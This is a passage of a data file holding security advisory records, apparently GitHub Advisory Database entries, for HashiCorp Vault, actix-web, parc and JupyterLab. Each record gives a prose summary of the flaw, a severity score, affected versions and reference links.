+1.4.0,GHSA-6239-28c2-9mrm,2022-08-04T11:22:29Z,2021-08-30T17:22:38Z,,['CVE-2021-38554'],Improper Removal of Sensitive Information Before Storage or Transfer in HashiCorp Vault,HashiCorp Vault and Vault Enterprise’s UI erroneously cached and exposed user-viewed secrets between sessions in a single shared browser. Fixed in 1.8.0 and pending 1.7.4 / 1.6.6 releases.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/vault'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.6.6'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/vault'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.7.0'}, {'fixed': '1.7.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-38554'}, {'type': 'WEB', 'url': 'https://discuss.hashicorp.com/t/hcsec-2021-19-vault-s-ui-cached-user-viewed-secrets-between-shared-browser-sessions/28166'}, {'type': 'PACKAGE', 'url': 'https://github.com/hashicorp/vault'}, {'type': 'WEB', 'url': 'https://github.com/hashicorp/vault/releases/tag/v1.6.6'}, {'type': 'WEB', 'url': 'https://github.com/hashicorp/vault/releases/tag/v1.7.4'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202207-01'}]","{'cwe_ids': ['CWE-212'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-30T17:14:06Z', 'nvd_published_at': '2021-08-13T16:15:00Z'}"
+1.4.0,GHSA-w65j-g6c7-g3m4,2021-08-24T19:13:30Z,2021-08-25T20:42:50Z,,[],Multiple memory safety issues in actix-web,"Affected versions contain multiple memory safety issues, such as:
+
+ - Unsoundly coercing immutable references to mutable references
+ - Unsoundly extending lifetimes of strings
+ - Adding the `Send` marker trait to objects that cannot be safely sent between threads
+
+This may result in a variety of memory corruption scenarios, most likely use-after-free.
+
+A signficant refactoring effort has been conducted to resolve these issues.
+",[],"[{'package': {'ecosystem': 'crates.io', 'name': 'actix-web'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.7.15'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/actix/actix-web/issues/289'}, {'type': 'PACKAGE', 'url': 'https://github.com/actix/actix-web'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2018-0019.html'}]","{'cwe_ids': ['CWE-362'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-24T19:13:30Z', 'nvd_published_at': None}"
+1.4.0,GHSA-xwxc-j97j-84gf,2023-06-13T20:35:51Z,2021-08-25T21:00:03Z,,[],Race condition in Parc,"In the affected versions of this crate, `LockWeak` unconditionally implemented `Send` with no trait bounds on `T`. `LockWeak` doesn't own `T` and only provides `&T`. This allows concurrent access to a non-Sync `T`, which can cause undefined behavior like data races.
+","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'parc'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.0.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/hyyking/rustracts/pull/6'}, {'type': 'PACKAGE', 'url': 'https://github.com/hyyking/rustracts/tree/master/parc'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0134.html'}]","{'cwe_ids': ['CWE-362'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-09T17:05:10Z', 'nvd_published_at': None}"
+1.4.0,GHSA-4952-p58q-6crx,2022-04-08T21:47:10Z,2021-08-23T19:40:22Z,,['CVE-2021-32797'],JupyterLab: XSS due to lack of sanitization of the action attribute of an html